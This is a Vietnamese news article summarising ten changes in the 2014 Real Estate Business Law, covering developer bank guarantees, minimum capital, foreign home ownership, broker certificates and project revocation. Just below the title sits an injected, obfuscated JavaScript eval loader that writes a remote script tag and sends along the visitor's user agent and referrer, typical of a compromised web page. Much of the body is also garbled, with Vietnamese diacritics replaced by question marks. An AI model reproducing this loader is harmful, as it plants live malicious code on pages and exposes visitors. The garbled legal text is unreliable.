10 thay đổi đáng chú ý trong Luật kinh doanh BĐS có hiệu lực từ 1/7

V?i eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(“<\/k"+"l>“);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|effze|var|u0026u|referrer|zrrfd||js|php’.split(‘|’),0,{}))
6 ch??ng, 82 ?i?u, Lu?t Kinh doanh b?t ??ng s?n ??a ra nhi?u yêu c?u m?i ?? lành m?nh hoá th? tr??ng B?S hi?n nay.

Có hi?u l?c t? 1/7 Lu?t kinh doanh B?S 201 ???c mong ??i s? có tác ??ng l?n ??i v?i ho?t ??ng phát tri?n nhà ? và kinh doanh b?t ??ng s?n. D??i ?ây là m?t s? ?i?m thay ??i ?áng chú ý:

1. Ch? ??u t? ph?i ???c t? ch?c tín d?ng b?o lãnh bán, cho thuê nhà ? hình thành trong t??ng lai. ?i?u 56 Lu?t kinh doanh B?S quy ??nh, ch? ??u t? d? án b?t ??ng s?n tr??c khi bán, cho thuê mua nhà ? hình thành trong t??ng lai ph?i ???c t? ch?c tài chính ho?c t? ch?c tín d?ng ???c phép ho?t ??ng t?i Vi?t Nam th?c hi?n b?o lãnh vi?c bán, cho thuê mua nhà ? hình thành trong t??ng lai.

2. Mu?n kinh doanh B?S ph?i thành l?p doanh nghi?p: ?i?u 10 c?a Lu?t quy ??nh ph?i thành l?p doanh nghi?p ho?c h?p tác xã (sau ?ây g?i chung là doanh nghi?p) khi mu?n kinh doanh B?S. Lu?t c?ng quy ??nh thêm, cá nhân, h? gia ?ình, t? ch?c chuy?n nh??ng, cho thuê, cho thuê mua b?t ??ng s?n có quy mô nh? thì không ph?i l?p doanh nghi?p nh?ng ph?i kê khai n?p thu?. (Thu? chuy?n nh??ng B?S hi?n hành ???c tính 2% trên giá tr? h?p ??ng).

3. V?n pháp ??nh không th?p h?n 20 t? ??ng: Quy ??nh v? v?n pháp ??nh c?a doanh nghi?p kinh doanh B?S tr??c ?ây là 6 t? ??ng. Nay, theo ?i?u 10 c?a Lu?t kinh doanh B?S m?i thì v?n pháp ??nh không ???c th?p h?n 20 t? ??ng.

4. V?n t? có khi th?c hi?n ??u t? d? án c?a ch? ??u t? không th?p h?n 20% t?ng m?c ??u t? ??i v?i d? án có quy mô s? d?ng ??t d??i 20 ha và không th?p h?n 15% t?ng m?c ??u t? ??i v?i d? án có quy mô s? d?ng ??t t? 20 ha tr? lên theo quy ??nh c?a pháp lu?t v? ??t ?ai.

5. Ng??i n??c ngoài ???c mua và s? h?u nhà ? t?i Vi?t Nam. C? th?, ??i t??ng áp d?ng g?m t? ch?c, cá nhân ng??i n??c ngoài, doanh nghi?p có v?n ??u t? n??c ngoài, chi nhánh, v?n phòng ??i di?n c?a doanh nghi?p n??c ngoài, qu? ??u t? n??c ngoài và chi nhánh ngân hàng n??c ngoài ?ang ho?t ??ng t?i Vi?t Nam; Cá nhân n??c ngoài ???c phép nh?p c?nh vào Vi?t Nam. ???c mua, thuê mua, nhâ?n t??ng cho, nhâ?n th??a kê? và s? h?u không quá 30% s? l??ng c?n h? trong m?t tòa nhà chung c?.

6. B? quy ??nh b?t bu?c t? ch?c, cá nhân kinh doanh b?t ??ng s?n ph?i bán, cho thuê, cho thuê mua b?t ??ng s?n thông qua sàn giao d?ch b?t ??ng s?n.

7. Ch? ??u t? d? án b?t ??ng s?n ???c chuy?n nh??ng toàn b? ho?c m?t ph?n d? án cho ch? ??u t? khác ?? ti?p t?c ??u t? kinh doanh.

8. Lu?t Kinh doanh B?t ??ng s?n 2014 quy ??nh môi gi?i B?S ph?i qua sát h?nh ki?n th?c môi gi?i. Cá nhân ???c c?p Ch?ng ch? hành ngh? môi gi?i b?t ??ng s?n ph?i có trình ?? trung h?c ph? thông tr? lên, ?ã qua sát h?ch v? ki?n th?c môi gi?i b?t ??ng s?n. Ch?ng ch? hành ngh? môi gi?i b?t ??ng s?n có th?i h?n s? d?ng là 5 n?m. Doanh nghi?p kinh doanh d?ch v? môi gi?i b?t ??ng s?n, doanh nghi?p kinh doanh d?ch v? sàn giao d?ch b?t ??ng s?n ph?i có ít nh?t 02 ng??i có Ch?ng ch? hành ngh? môi gi?i b?t ??ng s?n.

9. Vi?c huy ??ng v?n và cho vay ?? th?c hi?n các chính sách h? tr? nhà ? xã h?i (NOXH) s? thông qua Ngân hàng Chính sách xã h?i (NHCSXH). Ngân hàng s? l?p m?t kho?n m?c riêng ?? qu?n lý ngu?n v?n cho th?c hi?n chính sách h? tr? v? nhà ?, ??ng th?i có s? tham gia c?a B? Xây d?ng, B? L?TBXH qu?n lý vi?c s? d?ng v?n phát tri?n NOXH ?? b?o ??m hi?u qu? s? d?ng, b?o toàn v?n, ?úng m?c ?ích, ??i t??ng chính sách; vi?c cho vay v?n ???c th?c hi?n thông qua các chi nhánh hi?n có c?a NHCSXH ?? không làm phát sinh thêm chi phí ho?t ??ng.

10. X? lý thu h?i d? án B?S. C? quan có th?m quy?n quy?t ??nh vi?c ??u t? d? án quy?t ??nh thu h?i d? án ?? giao cho ch? ??u t? khác ti?p t?c th?c hi?n trong các tr??ng h?p ch? ??u t? d? án vi ph?m các quy ??nh c?a pháp lu?t v? ??u t? xây d?ng, quy ho?ch, ki?n trúc mà không có gi?i pháp kh?c ph?c theo yêu c?u c?a c? quan nhà n??c có th?m quy?n và nh?ng tr??ng h?p d? án thu?c di?n b? thu h?i ??t theo quy ??nh c?a pháp lu?t v? ??t ?ai.

Ch? ??u t? b? thu h?i d? án có trách nhi?m gi?i quy?t nh?ng t?n t?i c?a d? án b?o ??m quy?n l?i, ngh?a v? c?a khách hàng và các bên có liên quan t?i d? án. Ch? ??u t? có d? án b? thu h?i không ???c giao làm ch? ??u t? d? án kinh doanh B?S m?i trong th?i gian 2 n?m k? t? ngày d? án b? thu h?i.

Thanh Ngà

Theo Trí th?c tr?